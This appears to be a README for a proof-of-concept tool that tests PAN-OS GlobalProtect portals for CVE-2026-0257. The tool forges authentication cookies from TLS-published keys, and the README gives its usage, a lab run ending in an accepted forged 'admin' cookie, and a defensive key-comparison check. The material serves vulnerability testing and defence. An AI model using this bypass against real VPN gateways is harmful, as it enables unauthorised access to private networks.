A proof-of-concept script that tests a target PAN-OS GlobalProtect portal or gateway for CVE-2026-0257. The script retrieves the certificate chain presented by the HTTPS service and, for each public key in the chain, forges an authentication override cookie and submits it to the GlobalProtect target to see whether it is accepted.

A successfully forged cookie logs in to the GlobalProtect target and retrieves VPN connection information (use the --verbose argument to inspect it).
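
A defender-side check for the condition the script probes, added here as an example and not part of this project's code: it compares the SubjectPublicKeyInfo hash of the certificate configured for authentication override cookies against every certificate the HTTPS service presents. It assumes both have been exported as DER; the function names and the sample certificate skeletons are constructed for illustration.

```python
import hashlib

def read_tlv(buf, pos):
    """Return (tag, value_start, value_end) for the DER element at pos."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                      # long-form length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, pos, pos + length

def spki_sha256(cert_der):
    """SHA-256 over the subjectPublicKeyInfo of a DER-encoded X.509 certificate."""
    _, pos, _ = read_tlv(cert_der, 0)      # Certificate SEQUENCE
    _, pos, _ = read_tlv(cert_der, pos)    # tbsCertificate SEQUENCE
    tag, _, end = read_tlv(cert_der, pos)
    if tag == 0xA0:                        # optional [0] version field
        pos = end
    for _ in range(5):                     # serial, signature, issuer, validity, subject
        _, _, pos = read_tlv(cert_der, pos)
    _, _, end = read_tlv(cert_der, pos)    # subjectPublicKeyInfo
    return hashlib.sha256(cert_der[pos:end]).hexdigest()

def shared_key_indexes(cookie_cert_der, served_chain_der):
    """Positions in the served chain whose key equals the cookie certificate's key."""
    want = spki_sha256(cookie_cert_der)
    return [i for i, c in enumerate(served_chain_der) if spki_sha256(c) == want]

# --- constructed sample data: unsigned skeletons, not real certificates ---
def der(tag, body=b""):                    # encode one DER TLV
    n = len(body)
    size = (n.bit_length() + 7) // 8
    head = bytes([n]) if n < 0x80 else bytes([0x80 | size]) + n.to_bytes(size, "big")
    return bytes([tag]) + head + body

def sample_cert(serial, key_bytes):        # certificate-shaped structure around key_bytes
    alg = der(0x30, der(0x06, bytes.fromhex("2a864886f70d010101")) + der(0x05))
    spki = der(0x30, alg + der(0x03, b"\x00" + key_bytes))
    tbs = der(0x30, der(0xA0, der(0x02, b"\x02")) + der(0x02, bytes([serial]))
              + der(0x30) * 4 + spki)
    return der(0x30, tbs + der(0x30) + der(0x03, b"\x00"))

LEAF_KEY, CA_KEY = b"\x11" * 140, b"\x22" * 140
SERVED_CHAIN = [sample_cert(1, LEAF_KEY), sample_cert(2, CA_KEY)]
COOKIE_CERT_SHARED = sample_cert(9, CA_KEY)            # same key as chain entry [1]
COOKIE_CERT_DEDICATED = sample_cert(9, b"\x33" * 140)  # key not served over TLS

if __name__ == "__main__":
    print("shared:", shared_key_indexes(COOKIE_CERT_SHARED, SERVED_CHAIN))        # [1]
    print("dedicated:", shared_key_indexes(COOKIE_CERT_DEDICATED, SERVED_CHAIN))  # []
```

PEM exports can be converted with `ssl.PEM_cert_to_DER_cert` before calling `shared_key_indexes`; a non-empty result means a key the HTTPS service publishes is also the cookie certificate's key.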

Usage

$ python forge_cookie.py --help
usage: forge_cookie.py [-h] --target TARGET [--port PORT] [--user USER] [--domain DOMAIN] [--host-id HOST_ID]
                       [--client-os CLIENT_OS] [--client-ip CLIENT_IP] [--context {gateway,portal,both}] [--verbose]

Forge a GlobalProtect auth override cookie using the public key from TLS (CVE-2026-0257).

options:
  -h, --help            show this help message and exit
  --target TARGET       Target GlobalProtect portal or gateway (IP or hostname)
  --port PORT           Target port (default: 443)
  --user USER           Username to forge cookie for (default: admin)
  --domain DOMAIN       Domain for cookie (default: empty)
  --host-id HOST_ID     Host ID for cookie (default: empty)
  --client-os CLIENT_OS
                        Client OS for cookie (default: Windows)
  --client-ip CLIENT_IP
                        Client IP in cookie (default: 0.0.0.0)
  --context {gateway,portal,both}
                        Context to test: gateway, portal, or both (default target)
  --verbose             Print full response

Example

$ python forge_cookie.py --target 192.168.86.99
[*] Retrieving certificate chain from 192.168.86.99:443 ...
  Found 2 certificate(s) in chain:
  [0] CN=192.168.86.99 (RSA 2048 bits, CA=False)
  [1] CN=GP-Lab-CA (RSA 2048 bits, CA=True)

[*] Forging cookie for user 'admin', testing each key

  Trying [0] CN=192.168.86.99
  [-] Failure - Gateway did not accepted the forged cookie
  [-] Failure - Portal did not accepted the forged cookie

  Trying [1] CN=GP-Lab-CA
  [+] Success - Gateway accepted the forged cookie
  Cookie: bvUbfM5n5rWnZp8tp3AIE8Q/v9L7rJSgRb1suYHHBedwBrfUr4pItrluBYtQ3VtmkF0AYXw9hyipzrMC5qg0JO+ZHuZpHLIFNfhergPGRbLFBkRk9sriFMuGiRU1q3bBSF7PzxDn+0dy0+fG4Wf7u+JD4qQEcw+tIgp9UKv0IhyFY9XxwzYdrQucA8P9zKRkGiEQpFwD776mONJKnHZTe+R+D/wy49ATBWETuhD2NP+7dB2IeSfV2eGBiZWTJcLAxXpQHcKRImhTGKlw9o4Frw+RBVqh9aCXCQ4yLYuAviabWpV94Fhp/3aPVTrLDCOrbBilsu6Men9oOT3+b8Uw2g==